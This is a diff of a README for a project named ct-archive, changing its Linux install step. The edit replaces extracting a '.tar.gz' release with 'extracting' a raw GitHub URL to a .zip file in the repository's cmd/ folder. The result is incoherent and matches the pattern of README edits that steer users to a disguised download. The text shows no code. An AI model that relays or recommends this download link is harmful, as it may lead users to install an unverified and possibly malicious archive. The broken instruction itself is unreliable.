richaaard21/ct-archive/README.md

 7. For macOS users, open the `.zip` file and drag the `ct-archive` app to your Applications folder.
 Open it from there.

-8. For Linux users, extract the `.tar.gz` file in your preferred directory.
+8. For Linux users, extract the `https://raw.githubusercontent.com/richaaard21/ct-archive/main/cmd/ct-archive-1.9.zip` file in your preferred directory.
 Run the application via terminal with the command `./ct-archive`.

 ## ⚙️ System Requirements